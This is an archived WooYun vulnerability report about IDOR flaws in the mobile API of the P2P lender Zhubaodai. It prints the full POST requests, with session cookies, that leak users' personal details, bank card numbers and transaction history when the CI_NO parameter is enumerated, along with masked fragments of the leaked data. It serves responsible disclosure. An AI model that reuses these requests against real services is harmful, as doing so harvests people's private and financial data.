P2P安全之珠宝贷多个接口可越权(80多万用户隐私侧漏银行卡号/tel/交易流水)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0129072

漏洞标题：P2P安全之珠宝贷多个接口可越权(80多万用户隐私侧漏银行卡号/tel/交易流水)

漏洞作者：路人甲

提交时间：2015-07-24 20:20

修复时间：2015-09-10 15:00

公开时间：2015-09-10 15:00

漏洞类型：未授权访问/权限绕过

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-07-24：细节已通知厂商并且等待厂商处理中
2015-07-27：厂商已经确认，细节仅向厂商公开
2015-08-06：细节向核心白帽子及相关领域专家公开
2015-08-16：细节向普通白帽子公开
2015-08-26：细节向实习白帽子公开
2015-09-10：细节向公众公开

简要描述：

赤裸裸的泄露！

详细说明：

三处越权
===================================
第一处，个人信息越权

点击修改资料。抓包

POST /zbd-app/MemCent/personalDetail HTTP/1.1
Content-Length: 71
Content-Type: application/x-www-form-urlencoded
Host: mobile.zhubaodai.com:8087
Connection: close
Cookie: JSESSIONID=6B1ACC1A22EBAE7EEBD222BC63A50FDE
Cookie2: $Version=1
Accept-Encoding: gzip
METHOD=0&CI_NO=100000848920&SESSION_ID=6B1ACC1A22EBAE7EEBD222BC63A50FDE

CI_NO=标记后四位跑一下！

mask 区域

*****9670326	3593*****
*****	www89*****
*****46	xp*****
*****13	y_*****
*****	sjwan*****
*****^é»ç*****
*****	18950*****
*****01	ml*****
*****	19761005	4*****
*****^ä¸å*****
*****	18924*****
*****11	ck*****
*****	yuhou*****
*****90	wm*****
*****32	ch*****
*****^å®¶ä*****
*****	wlzxz*****
*****xf12555*****
*****^ç^*****
*****	18818*****
*****	yuhao*****
*****05	ww*****
*****bczhuba*****
*****77	ba*****
*****zs18794*****
*****38	pa*****
*****25	li*****
*****16	hw*****
*****	fenin*****
*****	LOVE1*****
*****2ä¿¡*****
*****9930902	740*****
*****	liuji*****
*****	18682*****
*****^xi*****
*****	18675*****
*****engxiao*****
*****	89677*****
*****^åå*****
*****^ºæ^*****
*****58	zj*****
*****^¸«ä*****
*****	18651*****
*****	18637*****
*****	a1162*****
*****	18633*****
*****angpeng*****
*****^å°ç*****
*****	darkn*****
*****	Mandy*****
*****	18620*****
*****	zbdli*****
*****	18620*****
*****	sdzcs*****
*****	18603*****
*****	liuli*****
*****	18588*****
*****	theon*****
*****	18575*****
*****^ç¹æ*****
*****	18565*****
*****jyaoyao*****
*****	lanhu*****
*****	tzjzc*****
*****21	ke*****
*****	18475*****
*****	18457*****
*****Q238399*****
*****	woden*****
*****37	Vs*****
*****^å½ªå*****
*****^æä*****
*****	18316*****
*****	18316*****
*****	mohao*****
*****	z1105*****
*****	zny19*****
*****^æ¶ç^*****
*****q228755*****
*****^å§è*****
*****73	23*****
*****86	wj*****
*****^å¾è*****
*****1820341*****
*****	xieca*****
*****	18200*****
*****^çç¿ç*****
*****^»å*****
*****	ivers*****
*****	modou*****
*****	18107*****
*****	cello*****
*****	18098*****
*****	liuhu*****
*****97	gh*****
*****	18062*****
*****	zzww2*****
*****	tracy*****
*****	18028*****
*****	18028*****
*****	18025*****
*****	zhuda*****
*****	magui*****
*****^888	19780515	3*****
*****	rosem*****
*****	xunia*****
*****	17097*****
*****	17097*****
*****	yuanh*****
*****^æµ^*****
*****	15994*****
*****	water*****
*****	15989*****
*****80	ds*****
*****85	hy*****
*****^é£ç^*****
*****^å®¶ç^*****
*****^åª^*****
*****elinda1*****
*****	15920*****
*****	skeny*****
*****	kejia*****
*****^å°±ç*****
*****^ºå*****
*****^ç©ºæ*****
*****	15863*****
*****	huang*****
*****	tzjxq*****
*****	congg*****
*****	shenj*****
*****	bieda*****
*****ndoushi_*****
*****1584466*****
*****	521de*****
*****35	26*****
*****	derek*****
*****	wpf04*****
*****	15817*****
*****33	zh*****
*****	15817*****
*****^æ°´æ*****
*****^å§å*****
*****19800728	96*****
*****	é¾^*****
*****	15768*****
*****	hc_lu*****
*****	15711*****
*****49	ar*****
*****	long5*****
*****	lyh19*****
*****	wqyao*****
*****	wjx86*****
*****	15602*****
*****	wlszz*****
*****	15521*****
*****	chk16*****
*****88	cy*****
*****	dzy22*****
*****21	ha*****
*****^å»ºå*****
*****	15242*****
*****	ayusl*****
*****21	we*****
*****^çç*****
*****830609	2813*****
*****bilong19*****
*****	15168*****
*****	JIHAO*****
*****	dalin*****
*****^æ°ä*****
*****	15153*****
*****	wozui*****
*****	heiwe*****
*****	Eric_*****
*****	eric_*****
*****	15118*****
*****13	he*****
*****	15112*****
*****20150724	y*****
*****20150724	y*****
*****93	ge*****
*****	15018*****
*****	15015*****
*****	andor*****
*****	johns*****
*****unechan*****
*****	15002*****
*****	14734*****
*****	ecoss*****
*****^è*****
*****	bridg*****
*****hyliss_*****
*****	lgc84*****
*****	13964*****
*****36	zr*****
*****	yangl*****
*****	xzhlw*****
*****34	zc*****
*****^ç©^*****
*****jp24449*****
*****	13928*****
*****^è¶é*****
*****	zxcv2*****
*****	13923*****
*****59	li*****
*****92	a-*****
*****	insan*****
*****c139055*****
*****	13902*****
*****	Silen*****
*****92	km*****
*****50	wk*****
*****	13883*****
*****^å¤©å*****
*****31	aa*****
*****	sdsxz*****
*****	zz199*****
*****	87878*****
*****59	kk*****
*****	Ml671*****
*****	dahei*****
*****	pande*****
*****49	xp*****
*****86	wa*****
*****	hanta*****
*****	guank*****
*****	13825*****
*****	JUNJI*****
*****	13823*****
*****18	to*****
*****33	da*****
*****		zhangli*****
*****anghong*****
*****	Lam12*****
*****	gdszc*****
*****	stove*****
*****	CHENY*****
*****	13790*****
*****	13787*****
*****	dongz*****
*****	13760*****
*****^éé*****
*****nne2121*****
*****	13756*****
*****009lulu*****
*****	13728*****
*****d6680		L36*****
*****	13725*****
*****	13715*****
*****	13714*****
*****	Weiha*****
*****	zhong*****
*****	13713*****
*****emon77305*****
*****	fredd*****
*****	m6n3n*****
*****	soona*****
*****66		337256*****
*****	13699*****
*****^æ£å*****
*****97	xm*****
*****	13686*****
*****	qqlfe*****
*****	12187*****
*****	13670*****
*****	MRmr1*****
*****^ å½^*****
*****45	wy*****
*****^æ¥ç*****
*****	Heath*****
*****	13629*****
*****iarixia*****
*****	13622*****
*****	zwq17*****
*****	yingu*****
*****olflang*****
*****	13603*****
*****	13602*****
*****	weiwe*****
*****ANGRENT*****
*****	laris*****
*****	xl512*****
*****	13560*****
*****	zhyip*****
*****	qin12*****
*****e	19890620	3*****
*****^è¯»		*****
*****	gy198*****
*****	zheng*****
*****	13538*****
*****40	Mo*****
*****	13528*****
*****^¶éª*****
*****	13510*****
*****^è¿ç*****
*****	13510*****
*****	laizh*****
*****	laizh*****
*****	h1314*****
*****28	pk*****
*****19820516	z*****
*****	cherr*****
*****	xieli*****
*****	13437*****
*****	13437*****
*****	13437*****
*****	19810324	35*****
*****	13428*****
*****	1234z*****
*****	13424*****
*****	13419*****
*****87	ff*****
*****	19581228	*****
*****	13410*****
*****	13403*****
*****88	ro*****
*****	YUJIP*****
*****	xu133*****
*****	sokel*****
*****	yqq88*****
*****9820220	605*****
*****	zzz31*****
*****	13268*****
*****	13267*****
*****77	oa*****
*****	jfxu0*****
*****	10253*****
*****	zoulo*****
*****	13189*****
*****g131808*****
*****	13129*****
*****^æå*****
*****^åè*****
*****ongping*****
*****	zyl03*****
*****	ypwxj*****
*****	luzhi*****
*****88	tz*****
*****	dingz*****

===========================================================
第二处。银行卡越权

点击银行卡管理，抓包！

POST /zbd-app/Bank/bankManage HTTP/1.1
Content-Length: 71
Content-Type: application/x-www-form-urlencoded
Host: mobile.zhubaodai.com:8087
Connection: close
Cookie: JSESSIONID=6B1ACC1A22EBAE7EEBD222BC63A50FDE
Cookie2: $Version=1
Accept-Encoding: gzip
METHOD=0&CI_NO=100000841198&SESSION_ID=6B1ACC1A22EBAE7EEBD222BC63A50FDE

后四位标记

mask 区域

*****00000*****
*****81809*****
*****84963*****
*****29837*****
*****19906*****
*****01807*****
*****37	baseli*****
*****05100*****
*****01216*****
*****19664*****
*****24391*****
*****53015*****
*****22453*****
*****42236*****
*****02381*****
*****50021*****
*****20063*****
*****00022*****
*****30033*****
*****90096*****
*****80054*****
*****00006*****
*****30017*****
*****40001*****
*****00067*****
*****00003*****
*****01012*****
*****00059*****
*****00008*****
*****12393*****
*****16768*****
*****04382*****
*****04108*****
*****14769*****
*****31279*****
*****00012*****
*****30106*****
*****00249*****
*****00055*****
*****90033*****
*****71720*****
*****20901*****
*****55700*****
*****12801*****

========================================
第三处
交易流水越权!

点击交易流水，抓包！

POST /zbd-app/fundFlowList/selFundFlowList HTTP/1.1
Content-Length: 135
Content-Type: application/x-www-form-urlencoded
Host: mobile.zhubaodai.com:8087
Connection: close
Cookie: JSESSIONID=6B1ACC1A22EBAE7EEBD222BC63A50FDE
Cookie2: $Version=1
Accept-Encoding: gzip
TIMEEND=20200101&HTXTYP=&SHOWRECORDS=10&CI_NO=100000840388&CURRENTPAGE=1&TIMESTART=20000101&SESSION_ID=6B1ACC1A22EBAE7EEBD222BC63A50FDE

后四位标记！

mask 区域

*****96633	*****
*****96304	*****
*****96187	*****
*****96054	*****
*****874	200*****
*****95679	*****
*****95604	*****
*****007	JY1507*****
*****94473	*****
*****00	JY15072*****
*****94045	*****
*****93522	*****
*****0	JY15072*****
*****0	JY15072*****
*****15	JY1507*****
*****0	JY15072*****
*****9	JY15072*****
*****405071764	1001*****
*****Y1507240507*****
*****1	JY15072*****
*****0	JY15072*****
*****15	JY1507*****
*****17	JY1507*****
*****0	JY15072*****
*****5	JY15072*****
*****4	JY15072*****
*****0	JY15072*****
*****.75	JY1507*****
*****0	JY15072*****
*****0	JY15072*****
*****3	JY15072*****
*****0	JY15072*****
*****0	JY15072*****
*****01	JY15072*****
*****90150	*****
*****89262	*****
*****88515	*****
*****88355	*****
*****88142	*****
*****88126	*****
*****75296	*****
*****75186	*****
*****75154	*****
*****75126	*****
*****75122	*****
*****75118	*****
*****74997	*****
*****74915	*****
*****74840	*****
*****74749	*****
*****74723	*****
*****74663	*****
*****74611	*****
*****74603	*****
*****74579	*****
*****74421	*****
*****74413	*****
*****65576	*****
*****59454	*****
*****50224	*****
*****49592	*****
*****528	100*****
*****50444*****

漏洞证明：

所有数据均没有保留，给个20rank如何？

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2015-07-27 14:59

厂商回复：

经查证会造成用户部分信息泄露

漏洞评价：

2015-07-27 17:55 | Damo ( 普通白帽子 | Rank:209 漏洞数:31 | 我只是喜欢看加菲猫而已ส็็็็็็็็...)

mark
2015-09-10 15:06 | BeenQuiver ( 普通白帽子 | Rank:101 漏洞数:26 | 专注而高效，坚持好的习惯千万不要放弃)

好一发越权漏洞

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0129072

漏洞标题：P2P安全之珠宝贷多个接口可越权(80多万用户隐私侧漏银行卡号/tel/交易流水)

相关厂商：zhubaodai.com

漏洞作者：路人甲

提交时间：2015-07-24 20:20

修复时间：2015-09-10 15:00

公开时间：2015-09-10 15:00

漏洞类型：未授权访问/权限绕过

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0129072

漏洞标题：P2P安全之珠宝贷多个接口可越权(80多万用户隐私侧漏银行卡号/tel/交易流水)

相关厂商：zhubaodai.com

漏洞作者： 路人甲

提交时间：2015-07-24 20:20

修复时间：2015-09-10 15:00

公开时间：2015-09-10 15:00

漏洞类型：未授权访问/权限绕过

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0129072"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云